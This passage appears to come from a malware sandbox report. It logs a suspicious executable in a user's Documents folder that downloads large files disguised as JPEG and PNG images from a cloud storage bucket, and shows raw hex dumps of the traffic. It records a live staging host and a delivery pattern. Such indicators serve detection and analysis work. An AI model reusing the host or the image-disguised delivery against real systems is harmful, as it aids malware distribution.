75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49885	118.178.60.9	443	7296	C:\Users\user\Documents\lOXFJk.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:22:38 UTC	115	OUT	GET /FOM-51.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:22:39 UTC	548	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:22:39 GMT Content-Type: image/jpeg Content-Length: 4859125 Connection: close x-oss-request-id: 677C9DFF9BB9203931A05DBB Accept-Ranges: bytes ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02" Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9060732723227198118 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 7myj7qf5scgQWa71cKKMAg== x-oss-server-time: 25
2025-01-07 03:22:39 UTC	3548	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-07 03:22:39 UTC	4096	IN	Data Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66 Data Ascii: B;K5Aat=BGjD=\|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@\|-$XW9!][b-I^pHcf
2025-01-07 03:22:39 UTC	4096	IN	Data Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14 Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
2025-01-07 03:22:39 UTC	4096	IN	Data Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c Data Ascii: E^h0X<LU)dF]:ywSDJu7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD\|T#c-Cpk^0ncLhz43h\`/k?_wE\
2025-01-07 03:22:39 UTC	4096	IN	Data Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9 Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;\|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
2025-01-07 03:22:39 UTC	4096	IN	Data Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7 Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ\|fan?adq~\|
2025-01-07 03:22:39 UTC	4096	IN	Data Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66 Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
2025-01-07 03:22:39 UTC	4096	IN	Data Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca Data Ascii: ~07,7OL\|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
2025-01-07 03:22:39 UTC	4096	IN	Data Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06 Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
2025-01-07 03:22:39 UTC	4096	IN	Data Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]\|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49964	118.178.60.9	443	7296	C:\Users\user\Documents\lOXFJk.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:22:50 UTC	115	OUT	GET /FOM-52.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:22:51 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:22:51 GMT Content-Type: image/jpeg Content-Length: 5062442 Connection: close x-oss-request-id: 677C9E0B3D53853136C7CE3D Accept-Ranges: bytes ETag: "70C21DA900796B279A09040B00953E40" Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 360383310743409046 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: cMIdqQB5ayeaCQQLAJU+QA== x-oss-server-time: 14
2025-01-07 03:22:51 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-07 03:22:51 UTC	4096	IN	Data Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|
2025-01-07 03:22:51 UTC	4096	IN	Data Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-07 03:22:51 UTC	4096	IN	Data Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus\|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
2025-01-07 03:22:51 UTC	4096	IN	Data Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,\|Zk!4ROn2 HPijFS~DcC69Kv m
2025-01-07 03:22:51 UTC	4096	IN	Data Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
2025-01-07 03:22:51 UTC	4096	IN	Data Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71 Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
2025-01-07 03:22:51 UTC	4096	IN	Data Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59 Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<\|=UyO}YzX<~+#~j8cZ2[.K0`++@)GZrg"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
